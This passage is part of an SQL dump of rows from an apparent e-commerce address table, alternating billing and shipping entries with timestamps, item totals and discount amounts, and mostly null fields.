(1158, 762, '2026-03-29 18:29:31', '2026-03-29 18:29:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1159, 763, '2026-03-29 20:35:08', '2026-03-29 20:35:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1160, 763, '2026-03-29 20:35:08', '2026-03-29 20:35:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1161, 764, '2026-03-29 20:35:14', '2026-03-29 20:35:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1162, 764, '2026-03-29 20:35:14', '2026-03-29 20:35:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1163, 765, '2026-03-29 20:35:15', '2026-03-29 20:35:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1164, 765, '2026-03-29 20:35:15', '2026-03-29 20:35:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1165, 766, '2026-03-29 20:35:16', '2026-03-29 20:35:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1166, 766, '2026-03-29 20:35:16', '2026-03-29 20:35:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1167, 767, '2026-03-29 20:35:18', '2026-03-29 20:35:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1168, 767, '2026-03-29 20:35:18', '2026-03-29 20:35:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1169, 768, '2026-03-29 20:35:19', '2026-03-29 20:35:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1170, 768, '2026-03-29 20:35:19', '2026-03-29 20:35:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1171, 769, '2026-03-29 20:35:20', '2026-03-29 20:35:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1172, 769, '2026-03-29 20:35:20', '2026-03-29 20:35:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1173, 770, '2026-03-29 20:35:22', '2026-03-29 20:35:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1174, 770, '2026-03-29 20:35:22', '2026-03-29 20:35:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1175, 771, '2026-03-29 20:35:23', '2026-03-29 20:35:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1176, 771, '2026-03-29 20:35:23', '2026-03-29 20:35:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1177, 772, '2026-03-29 20:35:24', '2026-03-29 20:35:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1178, 772, '2026-03-29 20:35:24', '2026-03-29 20:35:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1179, 773, '2026-03-29 20:35:26', '2026-03-29 20:35:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1180, 773, '2026-03-29 20:35:26', '2026-03-29 20:35:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1181, 774, '2026-03-29 20:35:27', '2026-03-29 20:35:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1182, 774, '2026-03-29 20:35:27', '2026-03-29 20:35:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1183, 775, '2026-03-29 20:35:28', '2026-03-29 20:35:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1184, 775, '2026-03-29 20:35:28', '2026-03-29 20:35:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1185, 776, '2026-03-29 20:35:36', '2026-03-29 20:35:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1186, 776, '2026-03-29 20:35:36', '2026-03-29 20:35:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1187, 777, '2026-03-29 20:35:41', '2026-03-29 20:35:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1188, 777, '2026-03-29 20:35:41', '2026-03-29 20:35:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1189, 778, '2026-03-29 20:35:46', '2026-03-29 20:35:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1190, 778, '2026-03-29 20:35:46', '2026-03-29 20:35:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1191, 779, '2026-03-29 20:35:51', '2026-03-29 20:35:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1192, 779, '2026-03-29 20:35:51', '2026-03-29 20:35:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1193, 780, '2026-03-29 20:35:56', '2026-03-29 20:35:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1194, 780, '2026-03-29 20:35:56', '2026-03-29 20:35:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1195, 781, '2026-03-29 21:24:52', '2026-03-29 21:24:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1196, 781, '2026-03-29 21:24:52', '2026-03-29 21:24:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1197, 782, '2026-03-29 21:24:57', '2026-03-29 21:24:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1198, 782, '2026-03-29 21:24:57', '2026-03-29 21:24:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1199, 783, '2026-03-29 21:24:58', '2026-03-29 21:24:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1200, 783, '2026-03-29 21:24:58', '2026-03-29 21:24:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1201, 784, '2026-03-29 21:24:59', '2026-03-29 21:24:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1202, 784, '2026-03-29 21:24:59', '2026-03-29 21:24:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1203, 785, '2026-03-29 21:25:01', '2026-03-29 21:25:01', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
